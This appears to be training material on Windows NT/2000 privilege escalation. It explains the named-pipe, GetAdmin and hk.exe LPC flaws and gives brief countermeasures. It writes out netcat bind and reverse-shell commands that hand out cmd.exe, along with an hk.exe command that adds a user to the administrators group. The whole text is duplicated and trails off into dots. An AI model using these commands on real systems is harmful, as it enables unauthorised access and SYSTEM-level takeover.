Privilege Escalation
If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.
This is called privilege escalation
Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the used account to that having increased privileges - such as that of an administrator. For example, if the attacker has access to a W2K SP1 server, he can run a tool such as ERunAs2X.exe to escalate his privileges to that of SYSTEM by using "nc.exe -1-p 50000 -d -e cmd.exe". Note this can also be used remotely.
For instance the named pipes prediction flaw in Windows 2000 allows interactively logged on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next Named Pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. By instructing the SCM to start an arbitrary service that runs as a highly privilege, (such as Clip Book which runs as SYSTEM) the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrator's group. The attacker can conclude his privilege escalation by logging out and then logging in.
Countermeasure General privilege escalation countermeasures include restricting interactive logons and access to systems programs that users do not require such as cmd.exe, auditing account logon events success, failure; privilege use success, failure and system events success, failure.
Tool: GetAdmin
GetAdmin.exe is a small program that adds a user to the local administrators group.
It uses low-level NT kernel routine to set a globalflag allowing access to any running process.
You need to logon to the server console to execute the program.
The GetAdmin.exe is run from the command line or from a browser.
This only works with Nt 4.0 Service pack 3.
On an NT machine GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that will add the specified user to the administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the rights to "Debug Programs" will always be able to run the program successfully. This is possible because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and ideally should be only granted to fully trusted users.
Similarly, if Getadmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. Getadmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read only. Therefore the only way to use GetAdmin to modify a domain account database is to log on a primary domain controller and run the utility locally on the PDC.
Tool: hk.exe
The hk.exe utility exposes a Local Procedure Call flaw in NT.
A non-admin user can be escalated to administrators group using hk.exe
C:\>net localgroup administrators peter /add Access Denied ------------------------------------------------ c:\>hk net localgroup administrators peter /add lsass pid & tid are: 47 -48 NtImpersonateClientOfPort succeeded
hk.exe takes advantage of the vulnerability in the API call to NT_Impersonate and allows the user to get the token of a kernel thread (LSASS or equivalent). The tool is a command line executable, and the user needs to just key in hk followed by any command he would want to run if he had NT Authority/System level privileges. Note that this is above the Administrator account privileges.
nc -1-p 23 nc -d -e cmd.exe 192.168.xx.xx 23 (Done on the active netcat running on the webserver) hk2 nc -d -e cmd.exe 192.168.xx.xx 23 lsass pid & tid are: 50 - 53
The NtImpersonateClientOfPort succeeds because of the nature by which port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients. Instead, it uses the original handle it got from the NtCreatePort call.
If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.
This is called privilege escalation
Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the used account to that having increased privileges - such as that of an administrator. For example, if the attacker has access to a W2K SP1 server, he can run a tool such as ERunAs2X.exe to escalate his privileges to that of SYSTEM by using "nc.exe -1-p 50000 -d -e cmd.exe". Note this can also be used remotely.
For instance the named pipes prediction flaw in Windows 2000 allows interactively logged on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next Named Pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. By instructing the SCM to start an arbitrary service that runs as a highly privilege, (such as Clip Book which runs as SYSTEM) the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrator's group. The attacker can conclude his privilege escalation by logging out and then logging in.
Countermeasure General privilege escalation countermeasures include restricting interactive logons and access to systems programs that users do not require such as cmd.exe, auditing account logon events success, failure; privilege use success, failure and system events success, failure.
Tool: GetAdmin
GetAdmin.exe is a small program that adds a user to the local administrators group.
It uses low-level NT kernel routine to set a globalflag allowing access to any running process.
You need to logon to the server console to execute the program.
The GetAdmin.exe is run from the command line or from a browser.
This only works with Nt 4.0 Service pack 3.
On an NT machine GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that will add the specified user to the administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the rights to "Debug Programs" will always be able to run the program successfully. This is possible because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and ideally should be only granted to fully trusted users.
Similarly, if Getadmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. Getadmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read only. Therefore the only way to use GetAdmin to modify a domain account database is to log on a primary domain controller and run the utility locally on the PDC.
Tool: hk.exe
The hk.exe utility exposes a Local Procedure Call flaw in NT.
A non-admin user can be escalated to administrators group using hk.exe
C:\>net localgroup administrators peter /add Access Denied ------------------------------------------------ c:\>hk net localgroup administrators peter /add lsass pid & tid are: 47 -48 NtImpersonateClientOfPort succeeded
hk.exe takes advantage of the vulnerability in the API call to NT_Impersonate and allows the user to get the token of a kernel thread (LSASS or equivalent). The tool is a command line executable, and the user needs to just key in hk followed by any command he would want to run if he had NT Authority/System level privileges. Note that this is above the Administrator account privileges.
nc -1-p 23 nc -d -e cmd.exe 192.168.xx.xx 23 (Done on the active netcat running on the webserver) hk2 nc -d -e cmd.exe 192.168.xx.xx 23 lsass pid & tid are: 50 - 53
The NtImpersonateClientOfPort succeeds because of the nature by which port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients. Instead, it uses the original handle it got from the NtCreatePort call.
..................................................................................................................................................................... .....................................................
..................................................................................................................................................................... .....................................................
..................................................................................................................................................................... ..................................................